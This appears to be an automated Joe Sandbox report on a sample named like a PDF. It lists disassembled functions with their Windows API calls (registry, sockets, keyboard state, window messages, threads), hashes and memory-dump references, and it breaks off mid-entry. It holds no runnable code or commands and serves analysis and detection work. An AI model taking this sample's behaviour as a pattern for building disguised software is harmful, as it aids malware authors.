                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Variant$Clear$ChangeInitType
                                                    • String ID:
                                                    • API String ID: 4136290138-0
                                                    • Opcode ID: 7caf028ad6cc033d2d7bb988c4f8627da563d33acab3c1e6f0c67f748cedde4d
                                                    • Instruction ID: 721b5ebd124825e1bee12e112567ac209890216a61c61233cc0c9ad664937fc0
                                                    • Opcode Fuzzy Hash: 7caf028ad6cc033d2d7bb988c4f8627da563d33acab3c1e6f0c67f748cedde4d
                                                    • Instruction Fuzzy Hash: 105139B5A00209EFDB15DF58C880EAAB7B8FF4C314B158559ED59DB301E730EA56CBA0
                                                    Function 003A0688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0034936C: __swprintf.LIBCMT ref: 003493AB
                                                      • Part of subcall function 0034936C: __itow.LIBCMT ref: 003493DF
                                                    • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 003A06EE
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 003A077D
                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 003A079B
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 003A07E1
                                                    • FreeLibrary.KERNEL32(00000000,00000004), ref: 003A07FB
                                                      • Part of subcall function 0035E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0038A574,?,?,00000000,00000008), ref: 0035E675
                                                      • Part of subcall function 0035E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0038A574,?,?,00000000,00000008), ref: 0035E699
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 327935632-0
                                                    • Opcode ID: 01d16737ce737701d4f5f6888cc9788e2399399ec8c1b3bc9f3ac995d9c84128
                                                    • Instruction ID: dc69d09052d2851b10356aad45d4c25c05c3ceeecfdee83570e0c288c656f9d1
                                                    • Opcode Fuzzy Hash: 01d16737ce737701d4f5f6888cc9788e2399399ec8c1b3bc9f3ac995d9c84128
                                                    • Instruction Fuzzy Hash: 60511575A002059FCB06EFA8C481DADB7F9EF59310B058069E916AF362DB71FE45CB90
                                                    Function 003A2E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003A2BB5,?,?), ref: 003A3C1D
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A2EEF
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003A2F2E
                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003A2F75
                                                    • RegCloseKey.ADVAPI32(?,?), ref: 003A2FA1
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 003A2FAE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                    • String ID:
                                                    • API String ID: 3740051246-0
                                                    • Opcode ID: e1311e90cb6e7be73cd015ec80ed4bb724f6e4b2144db01b6c08fc0631cd51af
                                                    • Instruction ID: b0e0f0f7dcad104d4d5454cdaea41ceadf1b9212221ace56f960d3099a047853
                                                    • Opcode Fuzzy Hash: e1311e90cb6e7be73cd015ec80ed4bb724f6e4b2144db01b6c08fc0631cd51af
                                                    • Instruction Fuzzy Hash: D7515A71218204AFD706EF68C881E6BB7F9FF89304F00892DF5959B2A1DB70E904CB52
                                                    Function 003ACCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 81e01fbc8b88ea2fdbec43966b380c1238587bf2b6907dae40b6e68775ee907c
                                                    • Instruction ID: 8667ddfcc76a13f8664d9d1b5e5ba3a372d86b3d1ffa9780c13873cf39f4bd3c
                                                    • Opcode Fuzzy Hash: 81e01fbc8b88ea2fdbec43966b380c1238587bf2b6907dae40b6e68775ee907c
                                                    • Instruction Fuzzy Hash: EE41B439910104AFC716DF68CC44FA9BB68EB0A310F161275F959A72E1C730AD51DB90
                                                    Function 00391206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003912B4
                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003912DD
                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0039131C
                                                      • Part of subcall function 0034936C: __swprintf.LIBCMT ref: 003493AB
                                                      • Part of subcall function 0034936C: __itow.LIBCMT ref: 003493DF
                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00391341
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00391349
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1389676194-0
                                                    • Opcode ID: 91243dddb53f8e09b07232d4a7a125c11647841e33b15c8b495d9c69500744f4
                                                    • Instruction ID: d5ea258f9cd589abc01ca6d052c3891d8c0e9c3e1c81aa1a8d8d023f00418aa1
                                                    • Opcode Fuzzy Hash: 91243dddb53f8e09b07232d4a7a125c11647841e33b15c8b495d9c69500744f4
                                                    • Instruction Fuzzy Hash: 4241FA39600105DFCF02EF64C981AAEBBF5EF09714B1484A9E94AAF362CB31ED01DB51
                                                    Function 0035B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCursorPos.USER32(000000FF), ref: 0035B64F
                                                    • ScreenToClient.USER32(00000000,000000FF), ref: 0035B66C
                                                    • GetAsyncKeyState.USER32(00000001), ref: 0035B691
                                                    • GetAsyncKeyState.USER32(00000002), ref: 0035B69F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AsyncState$ClientCursorScreen
                                                    • String ID:
                                                    • API String ID: 4210589936-0
                                                    • Opcode ID: e3b70bb0c5c2586c864b056766bcbf76eb7bb68f6896e78b92f2df89161cfad9
                                                    • Instruction ID: 23f2c4054c1bf5edf5604d4a5fc14dbe380e34a5ade12694d2d6999916f53a56
                                                    • Opcode Fuzzy Hash: e3b70bb0c5c2586c864b056766bcbf76eb7bb68f6896e78b92f2df89161cfad9
                                                    • Instruction Fuzzy Hash: E2413E35608119FBDF1A9F64C844EE9FBB4FB05325F204319F869962A0DB30A994DF91
                                                    Function 0037B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 0037B369
                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 0037B413
                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0037B41B
                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 0037B429
                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0037B431
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleep$RectWindow
                                                    • String ID:
                                                    • API String ID: 3382505437-0
                                                    • Opcode ID: 84ae56fb978539c2a0e16cdeb515c4652c09691226aabde21f22af1d4dab5cca
                                                    • Instruction ID: 2c0f25f64db6ec05fbe9d5f808d4f7959c85d2938e0f64cde47fdc1633a08e30
                                                    • Opcode Fuzzy Hash: 84ae56fb978539c2a0e16cdeb515c4652c09691226aabde21f22af1d4dab5cca
                                                    • Instruction Fuzzy Hash: 5B31C07190021DEFEF15CF68D94DB9EBBB9EB04319F118229F825EA1D1C3B49954CB90
                                                    Function 0037DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 0037DBD7
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0037DBF4
                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0037DC2C
                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0037DC52
                                                    • _wcsstr.LIBCMT ref: 0037DC5C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                    • String ID:
                                                    • API String ID: 3902887630-0
                                                    • Opcode ID: d90899e3d5c45d359d696dc53768ed84265cb7d458d7d1dc0d62f6d23b599f2e
                                                    • Instruction ID: c26d60b69847ac4005d964bc2a4d44a2e1c4e4a4612d2917868701de13120456
                                                    • Opcode Fuzzy Hash: d90899e3d5c45d359d696dc53768ed84265cb7d458d7d1dc0d62f6d23b599f2e
                                                    • Instruction Fuzzy Hash: 6621FF72204205ABEB279B29DC49E7B7BACDF45760F118039F80ECA191EAA5D841D3A0
                                                    Function 003ADE69 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003ADEB0
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 003ADED4
                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 003ADEEC
                                                    • GetSystemMetrics.USER32(00000004), ref: 003ADF14
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00393A1E,00000000), ref: 003ADF32
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$MetricsSystem
                                                    • String ID:
                                                    • API String ID: 2294984445-0
                                                    • Opcode ID: bbe1376f1c03890ecf61141f88cc5c281908ba979cca7be5357f485363c367b5
                                                    • Instruction ID: 9f8bd47979ffa0ad4aa03049e1283a629913b3dd27c88219428dd061be8f68b5
                                                    • Opcode Fuzzy Hash: bbe1376f1c03890ecf61141f88cc5c281908ba979cca7be5357f485363c367b5
                                                    • Instruction Fuzzy Hash: 4921A171611212AFCB264F798C48F6A77A8FB16325F160734F937DA9E0D730A860CB80
                                                    Function 0037BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0037BC90
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0037BCC2
                                                    • __itow.LIBCMT ref: 0037BCDA
                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0037BD00
                                                    • __itow.LIBCMT ref: 0037BD11
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$__itow
                                                    • String ID:
                                                    • API String ID: 3379773720-0
                                                    • Opcode ID: 2901ea22e4ac7ed4ba3b1d99cb04ef790084c2897e8060ba2c7f9060f063a409
                                                    • Instruction ID: ef093496ffa00f3d8cdd38acd64d1af2bdc0af58da153c2c9c734aff49a40436
                                                    • Opcode Fuzzy Hash: 2901ea22e4ac7ed4ba3b1d99cb04ef790084c2897e8060ba2c7f9060f063a409
                                                    • Instruction Fuzzy Hash: 1021D875600608BBDB33AE658C46FDFBABCAF4A710F018025FA49EF181DB749D0587A1
                                                    Function 00386318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003450E6: _wcsncpy.LIBCMT ref: 003450FA
                                                    • GetFileAttributesW.KERNEL32(?,?,?,?,003860C3), ref: 00386369
                                                    • GetLastError.KERNEL32(?,?,?,003860C3), ref: 00386374
                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003860C3), ref: 00386388
                                                    • _wcsrchr.LIBCMT ref: 003863AA
                                                      • Part of subcall function 00386318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003860C3), ref: 003863E0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                    • String ID:
                                                    • API String ID: 3633006590-0
                                                    • Opcode ID: ccce8b44bd82f4e5e502e06d7f6c1228aaef03ea79c7516ec7eca82a2ec50677
                                                    • Instruction ID: 61dc453720a22617a3da3f6afc890792b722f0c29c8044454745045a075441b1
                                                    • Opcode Fuzzy Hash: ccce8b44bd82f4e5e502e06d7f6c1228aaef03ea79c7516ec7eca82a2ec50677
                                                    • Instruction Fuzzy Hash: 5C21C3395043159BDB27BA78AC47FEA23ACAF06360F1044B9F445DB0E5EBE0A9849B54
                                                    Function 00398B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0039A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0039A84E
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00398BD3
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00398BE2
                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00398BFE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastconnectinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 3701255441-0
                                                    • Opcode ID: 4b441eb05ff2552a8ee925479b5e34fc7a2a60df7ffbdd34974a1b9544588f65
                                                    • Instruction ID: d882687a6ccdb8923175375094e4b7deb3cbbddc1f5c6a30b2e9df70553c03ce
                                                    • Opcode Fuzzy Hash: 4b441eb05ff2552a8ee925479b5e34fc7a2a60df7ffbdd34974a1b9544588f65
                                                    • Instruction Fuzzy Hash: 292190312002149FDB12AF68CC85F7EB7ADAF89750F044559F956EB3A2CB74AD018B61
                                                    Function 00398420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsWindow.USER32(00000000), ref: 00398441
                                                    • GetForegroundWindow.USER32 ref: 00398458
                                                    • GetDC.USER32(00000000), ref: 00398494
                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 003984A0
                                                    • ReleaseDC.USER32(00000000,00000003), ref: 003984DB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$ForegroundPixelRelease
                                                    • String ID:
                                                    • API String ID: 4156661090-0
                                                    • Opcode ID: b0dbf73e51ed40d5c76ce14e27954a27fae2e11d902e31da99bb2faaa7ad307d
                                                    • Instruction ID: b17d293d7134817d9f60dc38255fcf90223a7502d9af8af94940b1c2f6ee49dd
                                                    • Opcode Fuzzy Hash: b0dbf73e51ed40d5c76ce14e27954a27fae2e11d902e31da99bb2faaa7ad307d
                                                    • Instruction Fuzzy Hash: D0216275A00204AFDB01EFA5D845A5EBBE9EF49301F048879F85ADB251DB70BD00CB50
                                                    Function 0035AF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0035AFE3
                                                    • SelectObject.GDI32(?,00000000), ref: 0035AFF2
                                                    • BeginPath.GDI32(?), ref: 0035B009
                                                    • SelectObject.GDI32(?,00000000), ref: 0035B033
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ObjectSelect$BeginCreatePath
                                                    • String ID:
                                                    • API String ID: 3225163088-0
                                                    • Opcode ID: d48dd6f6b9c3a523a5ae58f2fcff88a237080f4df8a23f16f2f3a358fa8a27b1
                                                    • Instruction ID: 3935a9393c8e6e01e470ea94aaa9ab50ed3a84c1f585f88ac9f35cc35d2d9038
                                                    • Opcode Fuzzy Hash: d48dd6f6b9c3a523a5ae58f2fcff88a237080f4df8a23f16f2f3a358fa8a27b1
                                                    • Instruction Fuzzy Hash: A52160B0800205AFDB129F59ED84F9E7BA8B710356F18472AF825A61F0C3715849DB55
                                                    Function 0036217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __calloc_crt.LIBCMT ref: 003621A9
                                                    • CreateThread.KERNEL32(?,?,003622DF,00000000,?,?), ref: 003621ED
                                                    • GetLastError.KERNEL32 ref: 003621F7
                                                    • _free.LIBCMT ref: 00362200
                                                    • __dosmaperr.LIBCMT ref: 0036220B
                                                      • Part of subcall function 00367C0E: __getptd_noexit.LIBCMT ref: 00367C0E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                    • String ID:
                                                    • API String ID: 2664167353-0
                                                    • Opcode ID: 1b6ee2cf3488f4912603edeaa52447b706184de4fde23ef98de59fc70c0959c4
                                                    • Instruction ID: cb1a11f04bac597a5717192d8f1ac292967cf0c7a1ba5e1589f08d6e2eba802c
                                                    • Opcode Fuzzy Hash: 1b6ee2cf3488f4912603edeaa52447b706184de4fde23ef98de59fc70c0959c4
                                                    • Instruction Fuzzy Hash: A7112B331087466FDB13AFA5DC42D9B7B98EF01774B128829FE14CA149DB71D81187A0
                                                    Function 0037ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0037ABD7
                                                    • GetLastError.KERNEL32(?,0037A69F,?,?,?), ref: 0037ABE1
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,0037A69F,?,?,?), ref: 0037ABF0
                                                    • HeapAlloc.KERNEL32(00000000,?,0037A69F,?,?,?), ref: 0037ABF7
                                                    • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0037AC0E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
